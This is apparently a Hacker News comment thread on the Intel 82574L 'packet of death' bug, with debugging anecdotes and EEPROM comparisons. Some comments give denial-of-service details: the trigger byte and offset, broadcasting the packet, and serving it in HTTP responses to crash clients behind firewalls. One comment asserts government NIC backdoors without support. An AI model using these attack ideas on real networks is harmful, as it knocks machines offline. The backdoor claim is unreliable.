<i>That</i> is great HN content!<p>Debugging deep down the rabbit hole, until you find a bug in the NIC EEPROM - and the disbelief many show when hearing a software message can bring down a NIC.<p>I for one would enjoy reading more content like this on HN that what qualifies as best as a friday-night hack
Makes me wonder if this is related to in-band management? One of the interesting thing about working at NetApp, which had its own "OS" was that every driver was written by engineering. That allowed the full challenge of some of these devices to be experienced first hand.<p>One of the more painful summers resulted from a QLogic HBA which sometimes, for no apparent reason, injected a string of hex digits into the data it transmitted. There is a commemorative t-shirt of that bug with just the string of characters. It lead NetApp to putting in-block checksums into the file system so that corruption between the disk and memory, which was 'self inflicted' (and so passed various channel integrity checks) could be detected.<p>Here at Blekko we had a packet fragment that would simply vanish into the center switch. It would go in and never come out. We never got a satisfactory answer for that one. Keith, our chief architect, worked around it by randomizing the packet on a retransmit request.<p>The amount of code between your data and you that you can't control is, sadly, way larger than you probably would like.
I ran into a similar problem with an Intel motherboard about 10 years ago.<p>We had problems when some NFS traffic would end up getting stalled. Our NFS server would use UDP packets larger than the MTU and they would end up getting fragmented.<p>Turns out the NIC would not look at the fragmentation headers of the IP packet and always assume a UDP header was present. From time to time, the payload of the NFS packet would have user data that matched the UDP port number the NIC would scan for to determine if the packet should be forwarded to the BMC. This motherboard had no BMC but it was configured as if it did have one.<p>It would time out after a second or so but in the meantime drop a bunch of packets. The NFS server would retransmit the packet but since the payload didn't change, the NIC would reliably drop the rest of the fragments of the packet.<p>Of course Intel claimed it wasn't their bug ("it's a bug in the Linux NFS implementation") but they quickly changed their tune when I coded up a sample program that would send one packet a second and reliably cause the NIC to drop 99% of packets received.<p>While it turned out to be a fairly lame implementation problem on Intel's part (both by ignoring the fragmentation headers and the poor implementation of the motherboard) I have to say it was very satisfying to solve the mystery.
I've always had mixed emotions about NICs that have hardware assisted offload features. I welcome the decrease in CPU utilization and increased throughput, but the NIC ends up being a complex system that very subtle bugs can lurk inside versus being a simple I/O device that a kernel driver controls.<p>If there's denial of service hiding in there I wonder about what other security bugs might be lurking. It's scary stuff, and pretty much impossible to audit yourself.<p>Edit:<p>Also, I'm a little freaked-out that the EEPROM on the NIC can be modified easily with ethtool. I would have hoped for some signature verification. I guess I'm hoping for too much.<p>Edit 2:<p>I wonder if this isn't the same issue described here: <a href="https://bugzilla.redhat.com/show_bug.cgi?id=632650" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=632650</a>
Very good detective work. However, a small suggestion, given:<p><i>I’ve been working with networks for over 15 years and I’ve never seen anything like this. I doubt I’ll ever see anything like it again.</i><p>This is a very excellent case for fuzz testing. My thinking is that you want to whip up your Ruby and your EventMachine and Redis going and run a constant fuzz with all sorts of packets in your pre-shipping lab.<p>The idea is that you <i>want</i> to create a condition where you do see it, and the other handful of lockups that are there that you haven't yet seen.
Fantastic Article, Fantastic fine. Well done.<p>As a telecoms engineer predominantly selling Asterisk for the last 4 years and Asterisk experiance extending back to 2006 it's shocking to see this finally put right. For so many years, I have avoided the e1000 Intel controllers after a very public/embarassing situation when a conferencing server behaved in a wierd manner disrupting core services. Not having the expertise the author has, I narrowed it down to the Eth. Controller, Immediately replaced the server with IBM Hardware with Broadcom chipset and resumed our services in providing conferencing to some of the top FTSE100 companies.<p>Following this episode, I spend numerous days diagnosing the chipset with many conference calls with Digium engineers debugging the server remotely. In the end, no solution, recommendation to avoid the e1000 chipset and moved on.
As someone who works with FPGAs/ASICs, this isn't that weird.<p>Everything gets serialized/deserialized these days, so there's all kinds of boundary conditions where you can flip just the right bit and get the data to be deserialized the wrong way.<p>What's more interesting is that it bypasses all of the checks to prevent this from happening.<p>Here is the wiki page on the INVITE OF DEATH which sounds like the problem you hit:<p><a href="http://en.wikipedia.org/wiki/INVITE_of_Death" rel="nofollow">http://en.wikipedia.org/wiki/INVITE_of_Death</a>
Persistent bugger.<p>"With a modified HTTP server configured to generate the data at byte value (based on headers, host, etc) you could easily configure an HTTP 200 response to contain the packet of death - and kill client machines behind firewalls!"<p>That's worrisome, I'll bet there are lots of not-so-nice guys trying to figure out a way to do just that. There must be tons of server hardware out there with these cards in them.
I've been unable to reproduce this on systems equipped with the controller in question. I'd love to see "ethtool -e ethX" output for a NIC confirmed to be vulnerable.<p>/edit Ah, I spoke to soon; the author has updated his page here with diffs between affected and unaffected EEPROMs:<p><a href="http://www.kriskinc.com/intel-pod" rel="nofollow">http://www.kriskinc.com/intel-pod</a>
Can anyone remember the source of the quote :<p><pre><code> Sometimes bug fixing simply takes two people to lock themselves in a room and nearly kill themselves for two days.
</code></pre>
Reminded me of this
So is it only the byte at 0x47f that matters? Could you just send a packet filled with 0x32 0x32 0x32 0x32 0x32 to trigger this? (Like, download a file full of 0x32s?) Or does it have to look like a SIP packet?<p>You'd think the odds of getting a packet with 0x32 in position 0x47f is almost 1/256 per packet? So why aren't these network cards falling over everywhere every few seconds?
Before actually testing this with the real payload, is there a better way of determining if you have a potentially vulnerable driver than something like this?<p><pre><code> # awk '/eth/ { print $1 }' <(ifconfig -a) | cut -d':' -f1 | uniq | while read interface; do echo -n "$interface "; ethtool -i $interface | grep driver; done
eth0 driver: e1000e
eth1 driver: e1000e</code></pre>
Intruiging.<p>Intel 82574L ethernet controller looks to be popular too. Intel, Supermicro, Tyan and Asus use it on multiple current motherboards and Asus notably on their WS (Workstation) variants of consumer motherboards, e.g. the Asus P8Z77 WS (socket LGA 1155) and Asus Z9PE-D8 WS (dual CPU, socket LGA 2011).
I'm not surprised - firmware for ethernet controllers have grown quite complex, with the addition of new features that allow the hardware to do more work on behalf of the kernel.<p>Could this be a bug in the code of the EEPROM that handles TCP offloading, or one of the other hardware features that are now becoming more common? (<a href="https://en.wikipedia.org/wiki/TCP_offload_engine" rel="nofollow">https://en.wikipedia.org/wiki/TCP_offload_engine</a>)
My servers all have the affected cards (two per machine - yikes!) but so far I can't reproduce the bug (yay).<p>There are subtle differences between the offsets I get when I run "ethtool -e interface" versus those in the article that indicate an affected card (but they're quite close).<p>Mine are:<p>0x0010: ff ff ff ff 6b 02 69 83 43 10 d3 10 ff ff 58 a5<p>0x0030: c9 6c 50 31 3e 07 0b 46 84 2d 40 01 00 f0 06 07<p>0x0060: 00 01 00 40 48 13 13 40 ff ff ff ff ff ff ff ff<p>Output of "ethtool -i interface" (in case anyone wants to compare notes):<p>driver: e1000e
version: 1.5.1-k
firmware-version: 1.8-0<p>I tested both packet replays by broadcasting to all attached devices on a simple Gbit switch and no links dropped.
I had something similar in my home network, but my network foo is not good enough and I did not have to time to debug for days and weeks.<p>Basically one linux box with NVidia embedded gigabit controller could take down the whole segment. It would only happen after a random period, like after days when the box was busy. No two machines connected to the same switch would be able to ping each other any more after that. I suspected the switch, bad cables, etc. In the end I successfully circumvented the problem by buying a discrete gigabit ethernet card for the server in question.
Kielhofner is a pretty awesome guy. I met him a couple of times "back in the day" at Astricon conferences when he was hacking together Astlinux.<p>He was instrumental in taming the Soekris and Alix SBC boards of old and creating Asterisk appliances with them. If you've got a little asterisk box running on some embedded looking hardware somewhere, it doesn't matter whose name is on the sticker, its got some Kielhofner in it.<p>I live about a mile from Star2Star. I ought to pop in one of these days and see what they're up to.
This seems much more serious than the much-ballyhooed Pentium FDIV bug. Hopefully Intel will be on the ball with notifying people and distributing the fix.
Cool!<p>I'm currently working on an open source project where we are chasing "hang really hard and need a reboot to come back" issues with <i>exactly</i> this same ethernet controller, the Intel 82574L. I wonder if it's related!<p>Our Github issue: <a href="https://github.com/SnabbCo/snabbswitch/issues/39" rel="nofollow">https://github.com/SnabbCo/snabbswitch/issues/39</a>
Well this hurts. I have a critical machine with a dual NIC Intel motherboard. I had to abandon the 82579LM port because of unresolved bugs in the Linux drivers, and the other one is a 82574L, the one documented in this post.<p>I suppose I can send just the right ICMP echo packet to router to make it send me back an innoculating frame.
Reminds me of my own adventures with systems hanging on PXE boot when a Symantec Ghost PreOS Image didn't boot up completely, and went on to flood the network with packets. See <a href="http://dynamicproxy.livejournal.com/46862.html" rel="nofollow">http://dynamicproxy.livejournal.com/46862.html</a>
This somehow reminds me of the slammer SQL worm. A simply formed single packet caused a tsunami over the internet.<p>Personally, I am not at all surprised that this sort of thing exists. I'm sure there's lots more defects out there to be found. turning completeness is a cruel master.
I have mixed feelings about the write up. I think it gets clear pretty early on that the issue is in the NIC hardware at which point it is time to stop wasting your time investigating problem you can't fix and start contacting the vendor.
It's like a reverse example of a broken packet... You can see a number of interesting samples and stories in the museum of broken packets: <a href="http://lcamtuf.coredump.cx/mobp/" rel="nofollow">http://lcamtuf.coredump.cx/mobp/</a>
Congrats Sir, you've just discovered the Internet Kill-Switch!<p>The “red telephone,” used to shut down the entire Internet comes to mind.<p>You discovered howto immunize friends and kill enemies in CyberWars.<p>Do governments have an Internet kill switch?<p>Yes, see Egypt & Syria they're good examples. We know China is doing Cyberwars, they are beyond Kill-Switches.<p>Techcrunch: <a href="http://techcrunch.com/2011/03/06/in-search-of-the-internet-kill-switch/" rel="nofollow">http://techcrunch.com/2011/03/06/in-search-of-the-internet-k...</a><p>Wiki: <a href="http://en.wikipedia.org/wiki/Internet_kill_switch" rel="nofollow">http://en.wikipedia.org/wiki/Internet_kill_switch</a><p>We know Goverments deploy hardware that they can control when needed. Smartphones are the best examples for Goverment issued backdoors, next to some Intel Hardware (including NICs).
Author mentioned a custom package generator tool "Ostinato". I met the author of this tool 2-3 months back. A lone guy working on this tool as a side project. Amazing work. :)
It appears to work if you send the packet to the network broadcast address. Quick way to detect if any of the machines are vulnerable(they won't respond to the second ping).